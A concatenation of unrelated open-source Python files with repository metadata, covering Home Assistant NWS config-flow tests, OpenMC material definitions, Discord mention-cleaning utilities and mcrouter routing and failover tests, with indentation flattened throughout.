with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__ == '__main__':
""" This is the main fuction that will run the tests automatically
"""
unittest.main()
|
DTUWindEnergy/Python4WindEnergy
|
py4we/fortran_namelist_io.py
|
Python
|
apache-2.0
| 8,294
| 0.01278
|
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
|
jawilson/home-assistant
|
tests/components/nws/test_config_flow.py
|
Python
|
apache-2.0
| 3,482
| 0
|
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_function_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
return dec
dec1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2") # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
|
gems-uff/noworkflow
|
tests/test_disasm.py
|
Python
|
mit
| 831
| 0.002407
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
|
apache/incubator-systemml
|
src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py
|
Python
|
apache-2.0
| 1,549
| 0.002582
|
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
def clean(ctx, text=None, *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
if text is None:
text = ctx.message.content
if mass:
cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
|
guineawheek/Dozer
|
dozer/utils.py
|
Python
|
gpl-3.0
| 2,868
| 0.003138
|
from lib.base import BaseJiraAction
__all__ = [
'TransitionJiraIssueAction'
]
class TransitionJiraIssueAction(BaseJiraAction):
def run(self, issue_key, transition):
result = self._client.transition_issue(issue_key, transition)
return result
|
armab/st2contrib
|
packs/jira/actions/transition_issue.py
|
Python
|
apache-2.0
| 269
| 0
|
## Need to find a library
|
jacksarick/My-Code
|
Python/python challenges/euler/017_number_letter_counts.py
|
Python
|
mit
| 25
| 0.08
|
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
# This is based on QScintilla's configure.py, and only works for the
# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = False
for item in sip_flags.split(' '):
if item == '-t':
in_t = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = pyqtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
|
melvyn-sopacua/kdelibs
|
cmake/modules/FindPyQt.py
|
Python
|
gpl-2.0
| 1,768
| 0.001697
|
from collections import Iterable
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
'atom/b-cm', 'atom/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already initialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
if density == NO_DENSITY and units is not 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise ValueError(msg)
if not isinstance(percent, Real):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
if percent_type not in ['ao', 'wo']:
msg = 'Unable to add an Element to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
# Copy this Element to separate it from same Element in other Materials
element = deepcopy(element)
self._elements[element._name] = (element, percent, percent_type)
def remove_element(self, element):
"""Remove a natural element from the material
Parameters
----------
element : openmc.element.Element
Element to remove
"""
# If the Material contains the Element, delete it
if element._name in self._elements:
del self._elements[element._name]
def add_s_alpha_beta(self, name, xs):
r"""Add an :math:`S(\alpha,\beta)` table to the material
Parameters
----------
name : str
Name of the :math:`S(\alpha,\beta)` table
xs : str
Cross section identifier, e.g. '71t'
"""
if not isinstance(name, basestring):
msg = 'Unable to add an S(a,b) table to Material ID={0} with a ' \
'non-string table name {1}'.format(self._id, name)
raise ValueError(msg)
if not isinstance(xs, basestring):
msg = 'Unable to add an S(a,b) table to Material ID={0} with a ' \
'non-string cross-section identifier {1}'.format(self._id, xs)
raise ValueError(msg)
self._sab.append((name, xs))
def get_all_nuclides(self):
"""Returns all nuclides in the material
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are 2-tuples of
(nuclide, density)
"""
nuclides = {}
for nuclide_name, nuclide_tuple in self._nuclides.items():
nuclide = nuclide_tuple[0]
density = nuclide_tuple[1]
nuclides[nuclide._name] = (nuclide, density)
return nuclides
def _repr__(self):
string = 'Material\n'
string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
string += '{0: <16}{1}{2}'.format('\tDensity', '=\t', self._density)
string += ' [{0}]\n'.format(self._density_units)
string += '{0: <16}\n'.format('\tS(a,b) Tables')
for sab in self._sab:
string += '{0: <16}{1}[{2}{3}]\n'.format('\tS(a,b)', '=\t',
sab[0], sab[1])
string += '{0: <16}\n'.format('\tNuclides')
for nuclide in self._nuclides:
percent = self._nuclides[nuclide][1]
percent_type = self._nuclides[nuclide][2]
string += '{0: <16}'.format('\t{0}'.format(nuclide))
string += '=\t{0: <12} [{1}]\n'.format(percent, percent_type)
string += '{0: <16}\n'.format('\tElements')
for element in self._elements:
percent = self._nuclides[element][1]
percent_type = self._nuclides[element][2]
string += '{0: >16}'.format('\t{0}'.format(element))
string += '=\t{0: <12} [{1}]\n'.format(percent, percent_type)
return string
def _get_nuclide_xml(self, nuclide, distrib=False):
xml_element = ET.Element("nuclide")
xml_element.set("name", nuclide[0]._name)
if not distrib:
if nuclide[2] is 'ao':
xml_element.set("ao", str(nuclide[1]))
else:
xml_element.set("wo", str(nuclide[1]))
if nuclide[0]._xs is not None:
xml_element.set("xs", nuclide[0]._xs)
return xml_element
def _get_element_xml(self, element, distrib=False):
xml_element = ET.Element("element")
xml_element.set("name", str(element[0]._name))
if not distrib:
if element[2] is 'ao':
xml_element.set("ao", str(element[1]))
else:
xml_element.set("wo", str(element[1]))
return xml_element
def _get_nuclides_xml(self, nuclides, distrib=False):
xml_elements = []
for nuclide in nuclides.values():
xml_elements.append(self._get_nuclide_xml(nuclide, distrib))
return xml_elements
def _get_elements_xml(self, elements, distrib=False):
xml_elements = []
for element in elements.values():
xml_elements.append(self._get_element_xml(element, distrib))
return xml_elements
def get_material_xml(self):
"""Return XML representation of the material
Returns
-------
element : xml.etree.ElementTree.Element
XML element containing material data
"""
# Create Material XML element
element = ET.Element("material")
element.set("id", str(self._id))
if len(self._name) > 0:
element.set("name", str(self._name))
# Create density XML subelement
subelement = ET.SubElement(element, "density")
if self._density_units is not 'sum':
subelement.set("value", str(self._density))
subelement.set("units", self._density_units)
if not self._convert_to_distrib_comps:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides)
for subelement in subelements:
element.append(subelement)
# Create element XML subelements
subelements = self._get_elements_xml(self._elements)
for subelement in subelements:
element.append(subelement)
else:
subelement = ET.SubElement(element, "compositions")
comps = []
allnucs = self._nuclides.values() + self._elements.values()
dist_per_type = allnucs[0][2]
for nuc, per, typ in allnucs:
if not typ == dist_per_type:
msg = 'All nuclides and elements in a distributed ' \
'material must have the same type, either ao or wo'
raise ValueError(msg)
comps.append(per)
if self._distrib_otf_file is None:
# Create values and units subelements
subsubelement = ET.SubElement(subelement, "values")
subsubelement.text = ' '.join([str(c) for c in comps])
subsubelement = ET.SubElement(subelement, "units")
subsubelement.text = dist_per_type
else:
# Specify the materials file
subsubelement = ET.SubElement(subelement, "otf_file_path")
subsubelement.text = self._distrib_otf_file
# Create nuclide XML subelements
subelements = self.get_nuclides_xml(self._nuclides, distrib=True)
for subelement_nuc in subelements:
subelement.append(subelement_nuc)
# Create element XML subelements
subelements = self._get_elements_xml(self._elements, distrib=True)
for subelement_ele in subelements:
subelement.append(subelement_ele)
if len(self._sab) > 0:
for sab in self._sab:
subelement = ET.SubElement(element, "sab")
subelement.set("name", sab[0])
subelement.set("xs", sab[1])
return element
class MaterialsFile(object):
"""Materials file used for an OpenMC simulation. Corresponds directly to the
materials.xml input file.
Attributes
----------
default_xs : str
The default cross section identifier applied to a nuclide when none is
specified
"""
def __init__(self):
# Initialize MaterialsFile class attributes
self._materials = []
self._default_xs = None
self._materials_file = ET.Element("materials")
@property
def default_xs(self):
return self._default_xs
@default_xs.setter
def default_xs(self, xs):
check_type('default xs', xs, basestring)
self._default_xs = xs
def add_material(self, material):
"""Add a material to the file.
Parameters
----------
material : Material
Material to add
"""
if not isinstance(material, Material):
msg = 'Unable to add a non-Material {0} to the ' \
'MaterialsFile'.format(material)
raise ValueError(msg)
self._materials.append(material)
def add_materials(self, materials):
"""Add multiple materials to the file.
Parameters
----------
materials : tuple or list of Material
Materials to add
"""
if not isinstance(materials, Iterable):
msg = 'Unable to create OpenMC materials.xml file from {0} which ' \
'is not iterable'.format(materials)
raise ValueError(msg)
for material in materials:
self.add_material(material)
def remove_material(self, material):
"""Remove a material from the file
Parameters
----------
material : Material
Material to remove
"""
if not isinstance(material, Material):
msg = 'Unable to remove a non-Material {0} from the ' \
'MaterialsFile'.format(material)
raise ValueError(msg)
self._materials.remove(material)
def _create_material_subelements(self):
subelement = ET.SubElement(self._materials_file, "default_xs")
if self._default_xs is not None:
subelement.text = self._default_xs
for material in self._materials:
xml_element = material.get_material_xml()
self._materials_file.append(xml_element)
def export_to_xml(self):
"""Create a materials.xml file that can be used for a simulation.
"""
self._create_material_subelements()
# Clean the indentation in the file to be user-readable
sort_xml_elements(self._materials_file)
clean_xml_indentation(self._materials_file)
# Write the XML Tree to the materials.xml file
tree = ET.ElementTree(self._materials_file)
tree.write("materials.xml", xml_declaration=True,
encoding='utf-8', method="xml")
|
lilulu/openmc
|
openmc/material.py
|
Python
|
mit
| 18,937
| 0.000422
|
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
from mcrouter.test.MCProcess import Memcached
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestDevNull(McrouterTestCase):
config = './mcrouter/test/test_dev_null.json'
extra_args = []
def setUp(self):
# The order here must corresponds to the order of hosts in the .json
self.mc_good = self.add_server(Memcached())
self.mc_wild = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
mcr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config = './mcrouter/test/test_same_pool_failover.json'
extra_args = []
def setUp(self):
self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_same_pool_failover(self):
mcr = self.get_mcrouter()
self.assertEqual(mcr.get('foobar'), None)
self.assertTrue(mcr.set('foobar', 'bizbang'))
self.assertEqual(mcr.get('foobar'), 'bizbang')
mcr.delete('foobar')
self.assertEqual(mcr.get('foobar'), None)
class TestGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def failover_common(self, key):
self.mcr = self.get_mcrouter()
self.assertEqual(self.mcr.get(key), None)
self.assertTrue(self.mcr.set(key, 'bizbang'))
self.assertEqual(self.mcr.get(key), 'bizbang')
# kill the main host so everything failsover to gut
self.wildcard.terminate()
self.assertEqual(self.mcr.get(key), None)
self.assertTrue(self.mcr.set(key, 'bizbang-fail'))
self.assertEqual(self.mcr.get(key), 'bizbang-fail')
def test_get_failover(self):
self.failover_common('testkey')
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
self.assertEqual(self.mcr.get('testkey'), None)
